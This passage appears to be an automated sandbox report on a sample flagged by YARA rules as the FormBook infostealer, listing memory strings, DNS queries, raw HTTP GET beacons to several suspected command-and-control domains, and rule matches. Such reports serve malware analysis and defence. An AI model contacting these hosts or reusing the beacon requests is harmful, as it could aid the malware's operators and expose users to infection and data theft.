Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.therenixgroupllc.com/4hc5/www.7141999.com
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.therenixgroupllc.comReferer:
Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vurporn.com
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vurporn.com/4hc5/
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vurporn.com/4hc5/www.motionmixmedia.com
Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vurporn.comReferer:
Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000003.00000000.1656205865.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4099182802.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000003.00000000.1648506599.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000003.00000000.1648506599.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000003.00000000.1650634865.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106395909.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4094650297.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000003.00000000.1650634865.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106395909.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4094650297.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000003.00000002.4090581446.000000000370D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4088992932.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1645900730.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1646868780.0000000003700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000003.3106395909.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4094650297.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000003.00000000.1650634865.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106395909.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4094650297.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000003.3106395909.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4094650297.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
Source: explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000000.1656205865.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4099182802.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=quailrun-inc.com
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

Source: unknown

DNS traffic detected: queries for: www.quailrun-inc.com

Source: C:\Windows\explorer.exe

Code function: 3_2_0E5D8F82 getaddrinfo,setsockopt,recv,

3_2_0E5D8F82

Source: global traffic	HTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=/VQHqX0ksQJGmUtuF+SmenrWXhlVL4nIAkrjzD1bv3XMK1Eb428apYspiXxzNiZFnR1c HTTP/1.1Host: www.quailrun-inc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?P6=aEvA5DdolFnSpG3wqqUvIRZQPhFuP/nqnfvGSsdAIfGqv2pNtxEQnoAbm37B6N+rsMpI&ntxh9=V48LzvX0 HTTP/1.1Host: www.bollywood.nexusConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2 HTTP/1.1Host: www.lpqxmz.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=ZsWAow+yf8BBfalQduY7CMj5L6CLJOwgwJ6AETMAgkoaDSvJRnGnN78buAKwp8K6m6Gx HTTP/1.1Host: www.therealnikib.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?P6=Td1U1SjQUadfC3cbiTsqgzapHPyB/huuK+NgSE3DJAe+OSZ8lo2ZhtJstkIbAvBbRddo&ntxh9=V48LzvX0 HTTP/1.1Host: www.slotjitu88.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=+hA7uXL5jVPzGINsph1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkflq2ofsafzQv HTTP/1.1Host: www.iqixuehe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?P6=tOmE+Tzzb7HQLc2SkeB2EXcbcJrVSgBrP2Nr0WPSkAyRu+Yjx9aruD7HNlgfCbohliLP&ntxh9=V48LzvX0 HTTP/1.1Host: www.candicrem.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=qEWXZ3aqpcDZ/jSVREtayCI8W2IV6onyeM8faOppXvrhittFNUzvbhLP7PFzXYy9ta8e HTTP/1.1Host: www.therenixgroupllc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?P6=sJ+Ygj3voyzHV2SMJ+QMiTEgoYfBBcQbem66ypT0eUfc0EimMlq1mWlKocPRS2y/b4Gk&ntxh9=V48LzvX0 HTTP/1.1Host: www.7141999.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /4hc5/?ntxh9=V48LzvX0&P6=YIoXQxIAORK6HEHBIjyMxPOX2glibAcKMS7MvCp7xLT7Ek+j4imqU/IlDY2a3gBqxYgb HTTP/1.1Host: www.pacersun.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
